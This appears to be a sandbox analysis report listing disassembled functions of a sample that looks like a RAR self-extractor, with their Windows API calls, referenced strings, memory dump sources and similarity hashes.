Opcode Fuzzy Hash: cfa0277526433720f0263b2af73500b17a376e89b961b3abc1593bf04b6cf23e
Instruction Fuzzy Hash: B8413071900158A6CF20EBA49C89FEA737CFF55784F0444EAF589E3142EB74CB89CA65

Function 008D8E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 008D8F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 008D8F59
CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 008D8F80

Strings

utf-8"></head>, xrefs: 008D8EBD
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 008D8EB2
<html>, xrefs: 008D8EA7, 008D8EE0
</html>, xrefs: 008D8F0A

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: 9f1661c5d646afd8d2e6b2aa38541718d9c4f2f92dde022e1f41fa5093d2ab2e
Instruction ID: ecc574404cb9e9ca053d6c0f21aa6833e6cf441d4c6c93b7c1237acdfadf1248
Opcode Fuzzy Hash: 9f1661c5d646afd8d2e6b2aa38541718d9c4f2f92dde022e1f41fa5093d2ab2e
Instruction Fuzzy Hash: 51311531508355BBD721AB799C06F6B7758FF52720F10021BF911E73C1EF649A4983A6

Function 008D0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 008D0A9D

Part of subcall function 008CACF5: GetVersionExW.KERNEL32(?), ref: 008CAD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 008D0AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 008D0AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 008D0AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 008D0AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 008D0B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 008D0B3D
__aullrem.LIBCMT ref: 008D0BCB

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 1005c691b21c5a13ed46cf708b48642be8191f08e7f9e9eb2330e17c66b2f738
Instruction ID: d75b39f5f4bb9401dc2effe2b79f6ae268f0a22f90bde13c4064a742c677f3fd
Opcode Fuzzy Hash: 1005c691b21c5a13ed46cf708b48642be8191f08e7f9e9eb2330e17c66b2f738
Instruction Fuzzy Hash: 344107B1408306AFC714DF65C884A6BBBF8FB88714F004A2FF596D2650E779E549CB52

Function 008EEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,008EF5A2,?,00000000,?,00000000,00000000), ref: 008EEE6F
__fassign.LIBCMT ref: 008EEEEA
__fassign.LIBCMT ref: 008EEF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 008EEF2B
WriteFile.KERNEL32(?,?,00000000,008EF5A2,00000000,?,?,?,?,?,?,?,?,?,008EF5A2,?), ref: 008EEF4A
WriteFile.KERNEL32(?,?,00000001,008EF5A2,00000000,?,?,?,?,?,?,?,?,?,008EF5A2,?), ref: 008EEF83

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 9ab78411d308a59bcc8a2471efd565f5eb69944e72bfa076026179a33966eb6a
Instruction ID: 6543b830db79c19ea543bbbd0ffd766f6a37f2e338b8366f8f10e402752e1e70
Opcode Fuzzy Hash: 9ab78411d308a59bcc8a2471efd565f5eb69944e72bfa076026179a33966eb6a
Instruction Fuzzy Hash: 6251E670A00289AFCB10CFA9DC45AEEBBF9FF09300F24415AF555E7291DB30A941CB65

Function 008DC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 008DC54A
_swprintf.LIBCMT ref: 008DC57E

Part of subcall function 008C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008C401D

SetDlgItemTextW.USER32(?,00000066,0090946A), ref: 008DC59E
_wcschr.LIBVCRUNTIME ref: 008DC5D1
EndDialog.USER32(?,00000001), ref: 008DC6B2

Strings

%s%s%u, xrefs: 008DC573

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: c61ff5160c677411f224c87b125350b078bbccb4e94e515a7dfca591f7bf8e82
Instruction ID: c3c13570bef774ef4f17eca3d04d72cbff70ca3c990af05f08576f6bd37a2d90
Opcode Fuzzy Hash: c61ff5160c677411f224c87b125350b078bbccb4e94e515a7dfca591f7bf8e82
Instruction Fuzzy Hash: EC41FFB190061CAADF22DBA4DC45FEA77BDFB08705F0041A7E509E61A1EB709BC4CB51

Function 008D9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 008D964E
GetWindowRect.USER32(?,00000000), ref: 008D9693
ShowWindow.USER32(?,00000005,00000000), ref: 008D972A
SetWindowTextW.USER32(?,00000000), ref: 008D9732
ShowWindow.USER32(00000000,00000005), ref: 008D9748

Strings

RarHtmlClassName, xrefs: 008D96F4

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: ea5e69835f1a8024376dcadf7b48bbeb4775ce1f21f6efc8fd98a5f189015c76
Instruction ID: 038823dd69e340a61a1d2799b776e6150a7c533f3314e4673b92e9fe4da6694b
Opcode Fuzzy Hash: ea5e69835f1a8024376dcadf7b48bbeb4775ce1f21f6efc8fd98a5f189015c76
Instruction Fuzzy Hash: C0319D3110C204BFCB619F64DC48F6B7BA8FF48711F00465AFE89AA252DB34D965DB61

Function 008EBFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008EBF79: _free.LIBCMT ref: 008EBFA2

_free.LIBCMT ref: 008EC003

Part of subcall function 008E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958), ref: 008E84F4
Part of subcall function 008E84DE: GetLastError.KERNEL32(008F3958,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958,008F3958), ref: 008E8506

_free.LIBCMT ref: 008EC00E
_free.LIBCMT ref: 008EC019
_free.LIBCMT ref: 008EC06D
_free.LIBCMT ref: 008EC078
_free.LIBCMT ref: 008EC083
_free.LIBCMT ref: 008EC08E

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: e5da27addbf08757328d83f858d4a619aebd2a31bd3144f224040309a34062ad
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: D1114D31550F94F6D620BBB6CC06FCBB799FF02700F408854B69DE6492DF64A9048A92

Function 008E20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008E20C1,008DFB12), ref: 008E20D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008E20E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008E20FF
SetLastError.KERNEL32(00000000,?,008E20C1,008DFB12), ref: 008E2151

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b51368dc45c9b55eaf8f8939c2b1f2fae20a092e3536e83ac2d7c47fb757d528
Instruction ID: 5559f62065d8b96a78cc9c415416891b0d487a798eac9e38a46aa4b89b14c07b
Opcode Fuzzy Hash: b51368dc45c9b55eaf8f8939c2b1f2fae20a092e3536e83ac2d7c47fb757d528
Instruction Fuzzy Hash: 6001F132208755AEA6242BBB7C89D3A3A4DFB23734731062AF210D51F0EE519E00D104

Function 008DDC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

KERNEL32.DLL, xrefs: 008DDCB4
AcquireSRWLockExclusive, xrefs: 008DDCC9
ReleaseSRWLockExclusive, xrefs: 008DDCD9

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: d10626ff0c719de15713d0c80aebb9b482c3e87156728b5c490c710086a9afa0
Instruction ID: 19766f00149a9c12c55a7c7657860c9171be0ee5fa54d899617898a16515b052
Opcode Fuzzy Hash: d10626ff0c719de15713d0c80aebb9b482c3e87156728b5c490c710086a9afa0
Instruction Fuzzy Hash: B20128B16617226B4F30BF785C85AB623D4FB81317730133BE641D3340DEA1C882E6A0

Function 008D0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 008D0D0D

Part of subcall function 008CACF5: GetVersionExW.KERNEL32(?), ref: 008CAD1A

LocalFileTimeToFileTime.KERNEL32(?,008D0CB8), ref: 008D0D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 008D0D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008D0D56
SystemTimeToFileTime.KERNEL32(?,008D0CB8), ref: 008D0D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 008D0D72

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: f8ca7b056233f0bbdbfa0fc7ef1d94f17edaa9eab9339189f4b7e7d7c7b540b5
Instruction ID: c7a19dea3e04354b673abeff44a999da7f68fcee390b168aa1eaf337823f94d9
Opcode Fuzzy Hash: f8ca7b056233f0bbdbfa0fc7ef1d94f17edaa9eab9339189f4b7e7d7c7b540b5
Instruction Fuzzy Hash: C331A87A90020AEBCB00DFE5D885DEFBBB9FF58700B04456BE955E7210E7309645CB65

Function 008D91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 008D91D4
_memcmp.LIBVCRUNTIME ref: 008D91EB

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b29f0fbe67d0fccca90dba626dd760d424cda2bb05e0f8d7521be095e5667880
Instruction ID: fad4ec05f24999098811acd388898f2e9cd83a0f5066d9cc84a2910968c4ceed
Opcode Fuzzy Hash: b29f0fbe67d0fccca90dba626dd760d424cda2bb05e0f8d7521be095e5667880
Instruction Fuzzy Hash: 0621837160010EBBD7049F24CC81E3B77ADFF91798B10832AFD59DA302E674ED459691

Function 008E8FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00900EE8,008E3E14,00900EE8,?,?,008E3713,00000050,?,00900EE8,00000200), ref: 008E8FA9
_free.LIBCMT ref: 008E8FDC
_free.LIBCMT ref: 008E9004
SetLastError.KERNEL32(00000000,?,00900EE8,00000200), ref: 008E9011
SetLastError.KERNEL32(00000000,?,00900EE8,00000200), ref: 008E901D
_abort.LIBCMT ref: 008E9023

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 392f53031afd35ff0ab47e16c5498d48ad460695c9f3c00e847533b11966502d
Instruction ID: 5e69f72a176e3f166117e5811a932d734d61735d880d234d270a0d433341ade2
Opcode Fuzzy Hash: 392f53031afd35ff0ab47e16c5498d48ad460695c9f3c00e847533b11966502d
Instruction Fuzzy Hash: 0CF0A475504E91EBC621333F6C0AF3F296AFBE3B64B250115F51DD21E2EE60C9019516

Function 008DD2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 008DD2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008DD30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008DD31D
TranslateMessage.USER32(?), ref: 008DD327
DispatchMessageW.USER32(?), ref: 008DD331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 008DD33C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 9329de24488ee6517408b5b6d4d98a9b9eba29652af1921f8625b0c1f588e394
Instruction ID: 992737d8af9f6a47f644b212541c688f732aaf8aa4084af7919182bc2a249385
Opcode Fuzzy Hash: 9329de24488ee6517408b5b6d4d98a9b9eba29652af1921f8625b0c1f588e394
Instruction Fuzzy Hash: 7AF03C72A41219BBCB206BA1EC4CEEBBF6DFF51391F008112FA06D2110E6348542C7A1

Function 008DC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 008DC435

Part of subcall function 008D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008CBB05,00000000,.exe,?,?,00000800,?,?,008D85DF,?), ref: 008D17C2

Strings

MIN, xrefs: 008DC4A3
<, xrefs: 008DC41E
HIDE, xrefs: 008DC474
MAX, xrefs: 008DC487

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 02a8b08a06e92a8f327c30dd2971d3f3961e4944d95abbf5a186e17cbbc736f1
Instruction ID: 093e0b6b6a756d81c646a6735d861babe6276f384a6d5ed0249521b987307465
Opcode Fuzzy Hash: 02a8b08a06e92a8f327c30dd2971d3f3961e4944d95abbf5a186e17cbbc736f1
Instruction Fuzzy Hash: F531A17290020EAADF21DAA4CC45EEBB7BDFB14304F004267FA08D2250EBB08EC4CA51

Function 008DADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 008DADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 008DAE22
DeleteObject.GDI32(00000000), ref: 008DAE54
DeleteObject.GDI32(00000000), ref: 008DAE77

Part of subcall function 008D9E1C: FindResourceW.KERNEL32(008DAE4D,PNG,?,?,?,008DAE4D,00000066), ref: 008D9E2E
Part of subcall function 008D9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,008DAE4D,00000066), ref: 008D9E46
Part of subcall function 008D9E1C: LoadResource.KERNEL32(00000000,?,?,?,008DAE4D,00000066), ref: 008D9E59
Part of subcall function 008D9E1C: LockResource.KERNEL32(00000000,?,?,?,008DAE4D,00000066), ref: 008D9E64

Strings

], xrefs: 008DAE2A

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: a176ee44b2e37643bec3573235fc127931935a154ffd8c8d9e38ec87d39e386a
Instruction ID: 62ce5b24019fd63d6445e5301cee3ab675d1cfaff4a1b44013e615fdcc2c4612
Opcode Fuzzy Hash: a176ee44b2e37643bec3573235fc127931935a154ffd8c8d9e38ec87d39e386a
Instruction Fuzzy Hash: C201C036580215A6C7206B689C05A7F7B6AFB81B52F180216FD40F7391DB728C16E6B2

Function 008DCC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 008C130B: GetDlgItem.USER32(00000000,00003021), ref: 008C134F
Part of subcall function 008C130B: SetWindowTextW.USER32(00000000,008F35B4), ref: 008C1365

EndDialog.USER32(?,00000001), ref: 008DCCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 008DCCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 008DCD05
SetDlgItemTextW.USER32(?,00000068), ref: 008DCD14

Strings

RENAMEDLG, xrefs: 008DCCA8

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: c6fc6e1d9f3cf60a0b83ff17b5e98a7c0fc505f8e49a9bf89994ac5f73c73fe9
Instruction ID: c710ee53cf2aa36df0975892a944adc3ec17ba844a420c7b4e5c631646f159a4
Opcode Fuzzy Hash: c6fc6e1d9f3cf60a0b83ff17b5e98a7c0fc505f8e49a9bf89994ac5f73c73fe9
Instruction Fuzzy Hash: E70128323A82167AD5314F649C08FA73B6DFB9A702F204612F345E22E1C6715905D775

